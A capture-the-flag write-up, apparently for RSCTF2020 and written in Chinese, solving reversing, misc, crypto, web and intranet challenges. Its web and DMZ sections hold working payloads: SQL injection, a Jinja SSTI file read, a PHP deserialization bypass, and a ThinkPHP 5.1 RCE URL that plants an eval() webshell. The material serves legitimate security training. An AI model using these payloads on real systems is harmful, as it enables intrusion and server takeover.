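    size_t nbytes = 0x20;           /* the binary only accepts 32-byte input */

    for (size_t i = 0; i < nbytes; ++i) {
        int found = 0;
        /* Visit 0..127 then -128..-1, the order the original signed-char
         * loop used, without depending on whether `char` is signed. */
        for (int j = 0; j < 256; ++j) {
            int c = j < 128 ? j : j - 256;
            char hi, lo;
            encode_byte(c, &hi, &lo);
            if (res[2 * i] != hi || res[2 * i + 1] != lo)
                continue;
            a[i] = (unsigned char)j;
            printf("%02hhx", a[i]);
            found = 1;
            break;
        }
        if (!found) {
            fprintf(stderr, "\nno byte encodes to %.2s at index %zu\n", res + 2 * i, i);
            return 1;
        }
    }
    return 0;
}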

输出的值用RC4解密

from Crypto.Cipher import ARC4
import binascii

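key = 'encode'  # the key the binary keeps in v6 (see main above)


def rc4_crypt(key_bytes: bytes, data: bytes) -> bytes:
    """Apply the RC4 keystream to *data*; encryption and decryption are the same.

    Pure standard-library replacement for Crypto.Cipher.ARC4: key scheduling
    over a 256-byte state, then the PRGA XORed onto each input byte.
    Raises ValueError for an empty key.
    """
    if not key_bytes:
        raise ValueError("RC4 key must not be empty")
    state = list(range(256))
    j = 0
    klen = len(key_bytes)
    for i in range(256):  # key-scheduling algorithm
        j = (j + state[i] + key_bytes[i % klen]) & 0xFF
        state[i], state[j] = state[j], state[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) & 0xFF])
    return bytes(out)


# Hex printed by the C brute-forcer above: the raw RC4 ciphertext.
res = rc4_crypt(key.encode(), binascii.unhexlify("d462e9c3f4530218ecdb96a2df83e2f60f0c7845dfe7811c0df1e90dd02b6802"))

print(res)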

Flag


flag{374315ed9864f687d6d5144167944eb8}

RE5

Description


main:

// Challenge entry point (IDA pseudocode). v5..v10 hold the 43-character
// base64 text "OTVh...ZDI" (see Solution); BYTE3(v10) = 61 appends the '='
// padding after the input has been read, giving the 44-character comparison
// target. ptrace(PTRACE_TRACEME) is the same anti-debugging check as in RE3.
// sub_4008D0 base64-encodes the input into s2, which is then compared.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v3; // rdx
  __int64 v5; // [rsp+0h] [rbp-868h]
  __int64 v6; // [rsp+8h] [rbp-860h]
  __int64 v7; // [rsp+10h] [rbp-858h]
  __int64 v8; // [rsp+18h] [rbp-850h]
  __int64 v9; // [rsp+20h] [rbp-848h]
  __int64 v10; // [rsp+28h] [rbp-840h]
  __int16 v11; // [rsp+30h] [rbp-838h]
  char v12; // [rsp+40h] [rbp-828h]
  char s2; // [rsp+440h] [rbp-428h]
  unsigned __int64 v14; // [rsp+848h] [rbp-20h]

  v14 = __readfsqword(0x28u);
  v5 = 3481656678373807183LL; // v5..v9: 40 base64 characters, little-endian
  v10 = 4801626LL; // "ZDI" plus a zero byte
  v6 = 8595494054362705230LL;
  v7 = 7662428752547304538LL;
  v8 = 3774936019637192525LL;
  v9 = 3626860387272120153LL;
  v11 = 0;
  memset(&v12, 0, 0x400uLL);
  memset(&s2, 0, 0x400uLL);
  __printf_chk(1LL, "input flag:", a3);
  if ( ptrace(PTRACE_TRACEME, 0LL) < 0 ) // fails if a debugger is attached
  {
    __printf_chk(1LL, "no!", v3);
    exit(0);
  }
  __isoc99_scanf("%s", &v12); // unbounded read into a 0x400-byte buffer
  BYTE3(v10) = 61; // '=' padding, written into the 4th byte of v10
  sub_4008D0(&v12, strlen(&v12), &s2, 0LL); // base64(input) -> s2
  if ( !strcmp((const char *)&v5, &s2) )
    puts("yes");
  else
    puts("no");
  return 0LL;
}

sub_4008D0:

// Base64 encoder. a1/a2 are the input and its length, a3 the output buffer,
// a4 an optional out-parameter. v5 is the number of padding bytes (0..2)
// needed to round a2 up to a multiple of 3; each 3-byte group becomes four
// characters from the table byte_400D40, and the final group is padded with
// '=' (61) when v5 is 1 or 2 -- standard base64 without line breaks.
// Returns 0 on success and 0xFFFFFFFF for a NULL or empty input.
// NOTE(review): `*a4 = 8 * v6 / 0` is a division by zero in the pseudocode,
// most likely a decompiler artefact; main passes a4 == 0, so it is not reached.
__int64 __fastcall sub_4008D0(char *a1, int a2, _BYTE *a3, int *a4)
{
  _BYTE *v4; // r8
  int v5; // er11
  int v6; // esi
  int i; // er9
  char v8; // al
  char v10; // al

  if ( !a1 || !a2 )
    return 0xFFFFFFFFLL;
  v4 = a3;
  v5 = 0;
  if ( a2 % 3 )
    v5 = 3 - a2 % 3; // padding bytes
  v6 = v5 + a2; // padded length, a multiple of 3
  if ( v6 > 0 )
  {
    for ( i = 0; i < v6; i += 3 )
    {
      *v4 = byte_400D40[*a1 >> 2]; // top 6 bits of byte 0
      if ( i != v6 - 3 || v5 == 0 ) // full 3-byte group
      {
        v4[1] = byte_400D40[((16 * *a1) & 0x30) + ((int)(unsigned __int8)a1[1] >> 4)];
        v4[2] = byte_400D40[((4 * a1[1]) & 0x3C) + ((int)(unsigned __int8)a1[2] >> 6)];
        v4[3] = byte_400D40[a1[2] & 0x3F];
      }
      else if ( v5 == 1 ) // last group has 2 bytes: one '='
      {
        v4[1] = byte_400D40[((16 * *a1) & 0x30) + ((int)(unsigned __int8)a1[1] >> 4)];
        v10 = a1[1];
        v4[3] = 61;
        v4[2] = byte_400D40[(4 * v10) & 0x3C];
      }
      else if ( v5 == 2 ) // last group has 1 byte: two '='
      {
        v8 = *a1;
        v4[2] = 61;
        v4[3] = 61;
        v4[1] = byte_400D40[(16 * v8) & 0x30];
      }
      v4 += 4;
      a1 += 3;
    }
  }
  if ( a4 )
    *a4 = 8 * v6 / 0; // see NOTE above
  return 0LL;
}

Solution


审计一下sub_4008D0函数,发现就是base64的算法

那就找一下被加密的字符串

主函数里

  v5 = 3481656678373807183LL;
  v10 = 4801626LL;
  v6 = 8595494054362705230LL;
  v7 = 7662428752547304538LL;
  v8 = 3774936019637192525LL;
  v9 = 3626860387272120153LL;

变成字符:

 v5 = '0QTMhVTO';
  v10 = 'IDZ';
  v6 = 'wITM3EmN';
  v7 = 'jVjZhRTZ';
  v8 = '4cDO4MGM';
  v9 = '2U2NiJWY';

变成字符串:

"OTVhMTQ0NmE3MTIwZTRhZjVjMGM4ODc4YWJiN2U2ZDI"

直接base64解密即可

Exp


import base64

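# Base64 text assembled from v5..v10 in main() (43 characters). The binary
# appends exactly one '=' via BYTE3(v10) = 61, which is also the correct
# padding; the original script had "==", which lenient decoders tolerate.
str_enc = 'OTVhMTQ0NmE3MTIwZTRhZjVjMGM4ODc4YWJiN2U2ZDI='
# b64decode returns bytes; decode to text since the original Python 2
# script concatenated str objects.
flag = base64.b64decode(str_enc).decode('ascii')
print('flag{' + flag + '}')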

Flag


flag{95a1446a7120e4af5c0c8878abb7e6d2}

RE6

Description


源码:

// Challenge entry point (IDA pseudocode, 32-bit; system("pause") suggests a
// Windows build). The calculator menu is a decoy: choosing 42330 and two
// numbers that sum to 6 makes the program print the 32 bytes stored in
// v9..v16, each XORed with 6 -- the flag. sub_401020 / sub_401050 are not
// shown; from their arguments they are presumably printf / scanf.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  signed int v3; // esi
  int v4; // ST2C_4
  int v6; // [esp+4h] [ebp-34h]
  int v7; // [esp+8h] [ebp-30h]
  int v8; // [esp+Ch] [ebp-2Ch]
  int v9; // [esp+10h] [ebp-28h]
  int v10; // [esp+14h] [ebp-24h]
  int v11; // [esp+18h] [ebp-20h]
  int v12; // [esp+1Ch] [ebp-1Ch]
  int v13; // [esp+20h] [ebp-18h]
  int v14; // [esp+24h] [ebp-14h]
  int v15; // [esp+28h] [ebp-10h]
  int v16; // [esp+2Ch] [ebp-Ch]
  char v17; // [esp+30h] [ebp-8h]

  sub_401020("----------calculator---------\n");
  sub_401020("1.ADD\n");
  sub_401020("2.SUB\n");
  sub_401020("3.MUL\n");
  sub_401020("4.DIV\n");
  sub_401020("Select a algorithm from the list:");
  sub_401050("%d", &v6); // menu choice
  sub_401020("input two number:");
  sub_401050("%d %d", &v7, &v8);
  if ( v6 > 42330 )
  {
    sub_401020("error!");
  }
  else if ( v6 == 42330 ) // hidden option
  {
    v9 = 1731342645; // v9..v16: the XOR-encoded flag, 32 bytes little-endian
    v10 = 1684222819;
    v11 = 828728675;
    v12 = 1647718455;
    v13 = 878853937;
    v14 = 842022710;
    v15 = 1664169269;
    v16 = 1043686709;
    v17 = 0; // terminating NUL after the 32 bytes
    if ( v8 + v7 == 6 )
    {
      v3 = 0;
      do
      {
        v4 = *((unsigned __int8 *)&v9 + v3) ^ 6; // presumably passed on the stack to the call below
        sub_401020(&unk_402108);
        ++v3;
      }
      while ( v3 < 32 );
      sub_401020(&unk_40210C);
    }
  }
  else
  {
    switch ( v6 ) // arguments to these calls are not shown in the pseudocode
    {
      case 1:
        sub_401020("%d+%d=%d\n");
        break;
      case 2:
        sub_401020("%d-%d=%d\n");
        break;
      case 3:
        sub_401020("%d*%d=%d\n");
        break;
      case 4:
        sub_401020("%d/%d=%d\n");
        break;
    }
  }
  system("pause");
  return 0;
}

Solution


审计代码,输入42330,然后输俩数相加等于6

Flag


flag{374ae5ebecc7160d79d20964337e3c38}

MISC

好可爱的加密

Solution


颜文字,浏览器控制台直接执行js代码即可

Flag


flag{this_is_aaencode}

小姐姐

Solution


拖入winhex ,搜索flag即可

Flag


flag{xjj_haokanma}

奇怪的码

Solution


用ps把三个角的定位符补齐,扫码即可

Flag


flag{this_is_a_qrcode}

神秘文件

Solution


流量包分析,发现一个html格式的hehe,导出http,打开发现提示: '听说密码藏在源代码中'

js代码:

// Packed with a p,a,c,k,e,r-style packer: eval() of a self-decoding function whose
// string argument holds the real code with identifiers replaced by base-62 tokens
// and a '|'-separated dictionary. Removing the eval() and running it yields the
// unpacked source shown further down the page.
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B 1c=L J("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");B U=L J("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","{","}");B 1w=L J(0,1x,1y,1z,1A,1B,1C,1E,1G,1L,1M,1N,1O,1d,1e,1f,V);B 1R=L J(0,1,3,7,15,W,1h,1i,Z,1j,1k,1l,1m,1n,1o,1p,V);B R=L J(15,1q,10,16,3,12,3,2,11,1,12,15,6,6,12,7,0,10,14,2,1,7,8,15,13,4,1,7,15,13,0,5,1,11,3,11);B f=[];P(i=0;i<R.D;i++){f.1r(1c[R[i]])}f.18(4,0,U[16]);f.18(1s,0,U[17]);19(f.1t(\'\'),1u);1v 19(Q,O){B A="";P(B i=0;i<O.D;i++){A+=O.X(i).G()}B E=F.Y(A.D/5);B S=N(A.K(E)+A.K(E*2)+A.K(E*3)+A.K(E*4)+A.K(E*5));B T=F.1D(O.D/2);B M=F.1F(2,W)-1;B C=F.1H(F.1I()*1J)%1K;A+=C;1a(A.D>10){A=(N(A.1b(0,10))+N(A.1b(10,A.D))).G()}A=(S*A+T)%M;B H="";B I="";P(B i=0;i<Q.D;i++){H=N(Q.X(i)^F.Y((A/M)*Z));1P(H<16){I+="0"+H.G(16)}1Q I+=H.G(16);A=(S*A+T)%M}C=C.G(16);1a(C.D<8)C="0"+C;I+=C;1g(I)}',62,116,'||||||||||||||||||||||||||||||||||||prand|var|salt|length|sPos|Math|toString|enc_chr|enc_str|Array|charAt|new|modu|parseInt|pwd|for|str|index|mult|incr|hexToChar|65535|31|charCodeAt|floor|255|||||||||splice|encrypt|while|substring|hexatrigesimalToChar|65528|65532|65534|alert|63|127|511|1023|2047|4095|8191|16383|32767|21|push|37|join|011011001200|function|highBitMasks|32768|49152|57344|61440|63488|64512|ceil|65024|pow|65280|round|random|1000000000|100000000|65408|65472|65504|65520|if|else|lowBitMasks'.split('|'),0,{}))

eval加密,把eval删了,运行得到源码

// Unpacked form of the eval() blob above. index[] selects characters from the
// base-36 table hexatrigesimalToChar, and the two splice() calls insert '{' at
// position 4 and '}' at position 37, so f.join('') is the plaintext "flag{...}"
// that encrypt() is then applied to; highBitMasks/lowBitMasks are declared but
// never used. Note pwd is passed as a numeric literal (leading zero: legacy
// octal), not a string, so pwd.length is undefined inside encrypt().
var hexatrigesimalToChar=new Array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");var hexToChar=new Array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f","{","}");var highBitMasks=new Array(0,32768,49152,57344,61440,63488,64512,65024,65280,65408,65472,65504,65520,65528,65532,65534,65535);var lowBitMasks=new Array(0,1,3,7,15,31,63,127,255,511,1023,2047,4095,8191,16383,32767,65535);var index=new Array(15,21,10,16,3,12,3,2,11,1,12,15,6,6,12,7,0,10,14,2,1,7,8,15,13,4,1,7,15,13,0,5,1,11,3,11);var f=[];for(i=0;i<index.length;i++){f.push(hexatrigesimalToChar[index[i]])}f.splice(4,0,hexToChar[16]);f.splice(37,0,hexToChar[17]);encrypt(f.join(''),011011001200);function encrypt(str,pwd){var prand="";for(var i=0;i<pwd.length;i++){prand+=pwd.charCodeAt(i).toString()}var sPos=Math.floor(prand.length/5);
// LCG parameters derived from the digits of prand (built from pwd above).
var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos * 2) + prand.charAt(sPos * 3) + prand.charAt(sPos * 4) + prand.charAt(sPos * 5));
var incr = Math.ceil(pwd.length / 2);
var modu = Math.pow(2, 31) - 1;
// A random salt makes the output differ per run; it is appended in clear at the end.
var salt = Math.round(Math.random() * 1000000000) % 100000000;
prand += salt;
while (prand.length > 10) {
    prand = (parseInt(prand.substring(0, 10)) + parseInt(prand.substring(10, prand.length))).toString()
}
// From here prand is the state of a linear congruential generator.
prand = (mult * prand + incr) % modu;
var enc_chr = "";
var enc_str = "";
// XOR each character with one keystream byte and emit it as two hex digits.
for (var i = 0; i < str.length; i++) {
    enc_chr = parseInt(str.charCodeAt(i) ^ Math.floor((prand / modu) * 255));
    if (enc_chr < 16) {
        enc_str += "0" + enc_chr.toString(16)
    } else enc_str += enc_chr.toString(16);
    prand = (mult * prand + incr) % modu
}
// The salt is appended as 8 zero-padded hex digits.
salt = salt.toString(16);
while (salt.length < 8) salt = "0" + salt;
enc_str += salt;
alert(enc_str)
} 

可以看出,运行得到的flag被hex加密,解密即可

Flag


flag{3c32b1cf66c70ae2178fd417fd051b3b}

探测卫星

Solution


MMSTV接收音频信息,转成图片

探测卫星

Flag


flag{say_hello_from_space}

GIF的秘密

Solution


一个二维码,扫出 PASSis{0K_I_L0Ve_You_too} ,可能是之后要用的密码,题目肯定没这么简单

检测一下图片

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 260 x 260, 8-bit/color RGBA, non-interlaced
41            0x29            Zlib compressed data, compressed
4152358       0x3F5C26        End of Zip archive

分离出一个ZIP压缩包,被加密了,用前面扫出的密码打开,

得到一个损坏的gif图,用winhex检测一下文件完整性

gif格式的文件头是:47 49 46 38

手动把文件头补上:

然后把gif进行逐帧分离

# -*- coding:utf-8 -*-
from PIL import Image
import os
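gifFileName = 'test.gif'
# Frames are written to a directory named after the GIF (minus ".gif").
pngDir = gifFileName[:-4]
os.makedirs(pngDir, exist_ok=True)  # the original os.mkdir() failed on a re-run
# Walk the frames with tell()/seek(); PIL raises EOFError past the last frame,
# which is the documented way to detect the end of an animated image. The
# context manager closes the file handle once the loop is done.
with Image.open(gifFileName) as im:
    try:
        while True:
            current = im.tell()
            im.save(os.path.join(pngDir, str(current) + '.png'))
            im.seek(current + 1)
    except EOFError:
        pass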

一千多帧,在最后看到了

Flag


flag{g1f_1s_v3ry_magic}

Crypto

凯撒的宝藏

Solution


nc连上端口

# root @ pearcepwn in ~/temp [10:05:40] 
$ nc 192.168.1.115 28566
Welcome to the CTF world!
This code was obtained by Caesar when he encountered the fence.
Please decipher it,Submit your results to verify that they are correct.
[+]cipher = hihh;8/f:66758n};6/26f5/5f::ch58f77/d99:9
Please input your answer:

凯撒爆破

然后栅栏解密

Exp


凯撒爆破:

# coding=utf-8
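def caesar_shifts(text: str, down: int = 49, up: int = 128) -> list[str]:
    """Return every candidate the brute force prints, one string per line.

    The first ``down`` entries shift each character's code point down by
    0, 1, ..., down-1; the next ``up`` entries shift it up by 0, 1, ..., up-1.
    A shift that would take a code point below 0 (where the original script
    raised ValueError and aborted the whole run before the upward pass)
    yields '?' for that character instead.
    """
    def shifted(delta: int) -> str:
        codes = (ord(ch) + delta for ch in text)
        return ''.join(chr(code) if code >= 0 else '?' for code in codes)

    return [shifted(-j) for j in range(down)] + [shifted(j) for j in range(up)]


def main() -> None:
    """Read the cipher text from stdin and print all candidates."""
    text = input("Input:")
    for line in caesar_shifts(text):
        print(line)


if __name__ == "__main__":
    main()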

Flag


动态flag

学密码从RSA开始

Solution


$ nc 183.220.1.118 13097
[+]c = 0x10652cdfaa8367a45ced3c481a57a81a1e9e95e98e53bbb9098af448d8e1645d43963be074d916f40e0d53f52569bb94a66c0e6f0eb755f8340716e242865958c79a4356ddcff1c4f030421a3d893d58be1fd40e586bc62f4136ccacc81a50fbf35bbddbc3f3193a174fda6b99af38027aedeee690e9d6e949194be58f65L
[+]e = 0x3
[+]n = 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

e=3,n过大不能分解,不能用常规做法,所以我们采用小明文攻击

Exp


先把数转成十进制

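#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Small-exponent RSA attack (e = 3, unpadded message).

If m**e is only slightly larger than n, then m**e == c + k*n for some small k, so the
plaintext is the exact e-th root of c + k*n for the first k where that root is an integer.
This version is pure standard library: an integer Newton iteration replaces gmpy2.iroot
and int.to_bytes replaces Crypto.Util.number.long_to_bytes. It also bounds the search,
where the original ``while 1`` would spin forever on an input that has no small-k root.
"""

# Values the author solved against (the service transcript in the writeup shows n trimmed).
n = 216325650523795481281671236272037606099714685372297940777482247995284874499167357444401004742719440112657355303696059693053322211401580407326256931075891053567611994172000990330902578558964043013271655863902683507223240503209504664335116691253451038761613375103031529924354122115457759279692480223573982533028952510623005602104439511213261919019886695335538235995517609275817490605259808139187561336581732048007993244063887587556820229289482918793148251607112065163436407488328165633717295913539274051368482771049594634251710801894843643355177120752271661791387211011732881636127218353371247803740746694241436060973367766932015677262524786899898744289252440163973312693264120657059665251001080466332634698057325914243779354851804502672127933953609188128580261060705261061
e = 3
c = 175676150266632389064760712398978321387684326920722700352347329240205702752059122998815912983403547685991975883857974247962309625926300230284855614313945424661428659572013004755301649985913100442688432203933228437666189542703592415534690419592361026113369663758709403571517515958292660407074815679500133


def integer_root(x, k):
    """Return ``(r, exact)`` with ``r = floor(x ** (1/k))`` for integers ``x >= 0``, ``k >= 1``.

    Newton's iteration on Python ints, started from a power of two at or above the true
    root so the sequence decreases monotonically to the floor root; no float rounding is
    involved, so it is correct for arbitrarily large ``x``. ``exact`` is ``r ** k == x``.

    Raises:
        ValueError: if ``x`` is negative or ``k`` is smaller than 1.
    """
    if x < 0 or k < 1:
        raise ValueError("integer_root needs x >= 0 and k >= 1")
    if x < 2:
        return x, True
    # 2**ceil(bits/k) >= x**(1/k) because x < 2**bits.
    r = 1 << ((x.bit_length() + k - 1) // k)
    while True:
        nxt = ((k - 1) * r + x // r ** (k - 1)) // k
        if nxt >= r:
            break
        r = nxt
    return r, r ** k == x


def small_e_attack(c, n, e=3, max_k=100000):
    """Recover ``m`` from ``c = m**e mod n`` by trying ``c + k*n`` for ``k = 0, 1, ...``.

    Args:
        c: ciphertext.
        n: modulus.
        e: public exponent (small, typically 3).
        max_k: search bound; larger than the number of times ``m**e`` wrapped around ``n``.

    Returns:
        ``(m, k)`` for the first ``k`` whose ``c + k*n`` is a perfect ``e``-th power, or
        ``None`` if no such ``k`` exists below ``max_k``.
    """
    for k in range(max_k):
        root, exact = integer_root(c + k * n, e)
        if exact:
            return root, k
    return None


def main():
    found = small_e_attack(c, n, e)
    if found is None:
        print('[\033[0;31m-\033[0m] no exact root found within the search bound')
        return
    m, k = found
    # Big-endian byte string of m; the original used Crypto's long_to_bytes for the same thing.
    plain = m.to_bytes((m.bit_length() + 7) // 8, 'big')
    print('[\033[0;32m+\033[0m]res           = ' + str((m, k)))
    # errors="replace": a non-UTF-8 plaintext should still print instead of crashing here.
    print('[\033[0;32m+\033[0m]ASCII         = ' + plain.decode('utf8', errors='replace'))
    print('[\033[0;32m+\033[0m]long_to_bytes = ' + plain.hex())


if __name__ == '__main__':
    main()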

Flag


动态flag

WEB

他们说php很弱

Description


<?php
// Challenge source as posted. The weakness is PHP's loose comparison (==) between the two
// md5 hex digests: a digest of the form "0e<digits>" is treated as the number 0 * 10^n, so two
// different inputs whose digests both start with "0e" compare equal. A strict comparison (===)
// or hash_equals() would not be bypassable this way.
if ($_POST['submit']){
    $user = $_REQUEST['user'];
    $pwd = $_REQUEST['pwd'];
    if ($user == $pwd)  // only rejects identical raw inputs; the check below is the weak one
        die("illegal input");
    $pwd = md5($pwd);
    $user = md5($user);
    if ($user == $pwd){  // loose == on two hex strings: "0e..." == "0e..." is true (0 == 0)
        echo ("flag is here...");
        }
    else{"..."};
    else{"..."};
?>error_reporting(0);
// NOTE(review): from this line on the listing is a second, unrelated snippet that was fused
// into this one during extraction; it is repeated verbatim under "简单的sql注入" below.
if($username === 'admin' && $row['password'] === md5($password))
{
    die('flag{******************}');
}
else
{
    echo "Password error! </br>";
    echo "username: ";
    die($row['username']);
}

Solution


POST 传两个 md5 值都以 0e 开头的字符串即可:PHP 的弱比较(==)会把这类字符串当作数字 0,于是两者"相等"

一开始hackbar传参,传不上去,后来发现F12里把display:none删了,会有两个传参的框,输入就行

Exp


user=s878926199a&pwd=s1885207154a

Flag


动态flag

简单的sql注入

Description


// Challenge fragment as posted. $username / $password presumably come from the request and
// $row from a database lookup keyed on $username that is not shown; the writeup's payload
// suggests that query interpolates $username without escaping.
error_reporting(0);  // hides PHP/SQL error text, so the injection has to be found blind
// Both comparisons are strict (===), so this branch is not the bypass: username must literally
// be 'admin'. md5 for password storage is weak in any case (fast, unsalted).
if($username === 'admin' && $row['password'] === md5($password))
{
    die('flag{******************}');
}
else
{
    echo "Password error! </br>";
    echo "username: ";
    // Echoes a column of the looked-up row back to the client: whatever the injected query
    // places in that column (the writeup unions the password column into it) is disclosed.
    die($row['username']);
}

Solution


御剑后台扫描出了 index.php,页面内容是 phpinfo(),在里面搜索 flag,并没有找到

试试sql注入

username=1'&password=1
username=1'#&password=1  

发现可以注入

这题过滤的东西有点多,最后试出来

username=11' union select password,2 from users#&password=1

Flag


动态flag

my sound

Solution


测试

{{5*5}}

返回25确定是SSTI模板注入

{{5*'5'}}

如果返回55555,是jinja模板注入,直接找flag

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

Flag


动态flag

trick

Description


 <?php

class get_flag{
    public $str_1;
    public $str_2;
    // Runs when the object is destroyed, i.e. right after the unserialize() call below returns,
    // so attacker-controlled property values reach this code without any explicit call.
    public function __destruct(){
        $this->str_1 = (string)$this->str_1;  // str_1 is cast; str_2 keeps its deserialized type
        // Strict (!==) inequality on the raw values, but equality on md5() of both. md5() takes a
        // string, so str_2 is stringified there as well: a non-string str_2 whose string form
        // equals str_1 (the writeup uses the float INF, serialized as d:INF) passes all clauses.
        if($this->str_1 !== $this->str_2 && md5($this->str_1) === md5($this->str_2) && $this->str_1 !== $this->str_2)
            echo file_get_contents("/flag");
    }
}

// Deserializes attacker-controlled input: unserialize() instantiates whatever class the payload
// names (here get_flag) and its __destruct() fires afterwards. The parameter name contains a
// dot, which PHP rewrites when filling $_GET; the writeup covers how to still reach this key.
unserialize($_GET["my_secret.key"]);

show_source(__FILE__);  

Solution


构造反序列化 payload,用 INF 绕过 md5 的强比较(===)

<?php
// Local copy of the target class with the file read swapped for an "echo", used to confirm
// offline that the INF values satisfy the condition before sending the payload.
class get_flag{
    public $str_1;
    public $str_2;
    public function __destruct(){
        $this->str_1 = (string)$this->str_1;  // becomes the string "INF"; str_2 stays the float INF
        // "INF" !== INF (string vs float) holds, and md5() stringifies both to "INF", so the digests match.
        if($this->str_1 !== $this->str_2 && md5($this->str_1) === md5($this->str_2) && $this->str_1 !== $this->str_2)
            echo "success"; 
 }
}
    // Build the object the target's __destruct() will see and print its serialized form;
    // the local __destruct() also runs at script end and confirms the condition holds.
    $probe = new get_flag();
    $probe->str_1 = INF;
    $probe->str_2 = INF;
    $payload = serialize($probe);
    echo $payload;
?>

发现可以成功绕过

O:8:"get_flag":2:{s:5:"str_1";d:INF;s:5:"str_2";d:INF;}

构造payload

?my_secret.key=O:8:"get_flag":2:{s:5:"str_1";d:INF;s:5:"str_2";d:INF;}

没响应,等号右边的序列化构造应该没有问题,那么问题就出在my_secret.key上面

这里考了一个知识点,PHP 会把 GET 参数名中的空格和点转换为下划线

但是变量名中出现 [ 时,只有这个 [ 会被替换为下划线,其后的 . 保持原样,因此 my[secret.key 在 $_GET 里正好变成 my_secret.key

Exp


?my[secret.key=O:8:"get_flag":2:{s:5:"str_1";d:INF;s:5:"str_2";d:INF;}

Flag


动态flag

hash

Description


 <?php 
// Challenge source as posted.
error_reporting(0); 
// Presumably defines $flag, which is echoed below (file not shown).
include("flag.php"); 
// sha384 digest the request must match; the writeup resolves it to the string "flag" by lookup.
$key = '92d2616694c9c29e0295298184e110607b3bbfe10fb572d8f5c4d6e78fb30dee83da69bf85a8e7fa444241b9b880b1c9'; 
$req = parse_url($_SERVER['REQUEST_URI']); 
if(isset($req["query"])){ 
    $query = $req["query"]; 
    // parse_str() returns null, so $req_query is never non-null and the branch below never
    // runs. Without a result argument, parse_str() on PHP < 8 instead registers every query
    // key as a variable in this scope, which is how $act gets its value (variable injection).
    // That form was removed in PHP 8, where $act would simply stay unset.
    $req_query = parse_str($query); 
    if($req_query!=NULL){ 
        $act = $req_query['act']; 
    } 

    if($act==="user"){ 
        $point = $_GET["point"]; 
        // Constant-time hash_equals() would be the usual way to compare digests; here the
        // secret is a short dictionary word, so the lookup in the writeup is the real weakness.
        $input = hash('sha384', $point); 
        if($input!==$key){ 
            die("NO!"); 
        } 

        echo $flag; 
    } 
}else{ 
    show_source(__FILE__); 
}?> 

Solution


大概意思就是 GET 方式传两个参数,act === "user",并且 point 的 sha384 哈希值等于 92d2616694c9c29e0295298184e110607b3bbfe10fb572d8f5c4d6e78fb30dee83da69bf85a8e7fa444241b9b880b1c9

找个在线网站反查这个 sha384 值(哈希不可逆,靠的是查表),得到字符串 flag

Exp


?act=user&point=flag

Flag


动态flag

ending

找博客的漏洞,8-)会

Intranet

内网渗透,需要连vpn,闯关形式,得到flag才能写后面的题目

DMZ

Solution:


攻防世界WEB高手进阶区 php_rce 原题,师傅们手速网速太快了

原理: ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

网页使用的是ThinkPHP框架,版本为5.1 ,百度一下发现此版本存在getshell漏洞

直接查找flag

http://192.168.2.109/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

并没有,那就get方式传一个一句话木马上去,蚁剑直接连

192.168.2.109/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["shell"]);?>

根目录找到flag

Flag


flag{ac578aa2-87d8-4d3a-b9ed-b64d082123c3}

签到题

车票拿好

Description:

欢迎来到RSCTF2020 关注公众号 七色堇安全 NEEPUSec 网络安全团队 分别回复RSCTF获得完整车票 还等什么?快上车!


Solution:

关注即可,发送 RSCTF


Flag:

动态flag